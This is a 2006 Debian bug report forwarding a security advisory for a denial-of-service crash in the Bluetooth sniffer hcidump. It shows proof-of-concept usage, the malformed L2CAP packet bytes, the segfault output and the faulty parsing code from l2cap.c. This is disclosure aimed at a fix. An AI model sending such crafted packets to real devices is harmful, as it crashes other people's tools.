[Pkg-bluetooth-maintainers] Bug#351881: bluez-hcidump: DoS in hcidump

Moritz Muehlenhoff jmm at inutil.org
Wed Feb 8 08:36:56 UTC 2006


Package: bluez-hcidump
Severity: important
Tags: security

This was posted to the VulnWatch list, I'm not sure whether it can only be
abused to interfere with the sniffing of Bluetooth traffic or whether more harm
can be done. If it's the former, it's probably harmless, but please check.

Cheers,
        Moritz

[Software affected] hcidump

[Version] 1.29 (may be other)

[Impact] Denial of Service (may be more)

[Credits] Pierre Betouin - pierre.betouin at infratech.fr - Bug found with BSS v0.6 GPL fuzzer (Bluetooh Stack Smasher)

BSS could be downloaded on http://www.secuobs.com/news/05022006-bluetooth10.shtml

[Vendor] was notified

[Original advisory]

http://www.secuobs.com/news/05022006-bluetooth9.shtml#english
http://www.secuobs.com/news/05022006-bluetooth9.shtml#french

[PoC] download it on http://www.secuobs.com/news/05022006-bluetooth8.shtml

[PoC usage]

# ./hcidump-crash 00:80:09:XX:XX:XX
L2CAP packet sent (15)
Buffer: 08 01 0B 00 41 41 41 41 41 41 41 41 41 41 41

# hcidump
HCI sniffer - Bluetooth packet analyzer ver 1.29
device: hci0 snap_len: 1028 filter: 0xffffffff
< HCI Command: Create Connection (0x01|0x0005) plen 13

> HCI Event: Command Status (0x0f) plen 4
> HCI Event: Connect Complete (0x03) plen 11

< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4
< ACL data: handle 41 flags 0x02 dlen 19
    L2CAP(s): debug : code=8
Echo req: dlen 12
    L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
(...)
    L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
segmentation fault

[Affected code location] l2cap.c

[Affected code]

while (frm->len >= L2CAP_CMD_HDR_SIZE) {
    if (!p_filter(FILT_L2CAP)) {
        p_indent(level, frm);
        printf("L2CAP(s): ");
    }

    switch (hdr->code) {
    l2cap_cmd_hdr *hdr = frm->ptr;
    frm->ptr += L2CAP_CMD_HDR_SIZE;
    frm->len -= L2CAP_CMD_HDR_SIZE;
    (...)
    default:
        if (p_filter(FILT_L2CAP))
            break;
        printf("code 0x%2.2x ident %d len %d\n",
            hdr->code, hdr->ident, btohs(hdr->len));
            raw_dump(level, frm);
    }
    frm->ptr += btohs(hdr->len);
    frm->len -= btohs(hdr->len);

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.14-2-686
Locale: LANG=C, LC_CTYPE=de_DE.ISO-8859-15 at euro (charmap=ISO-8859-15)




More information about the Pkg-bluetooth-maintainers mailing list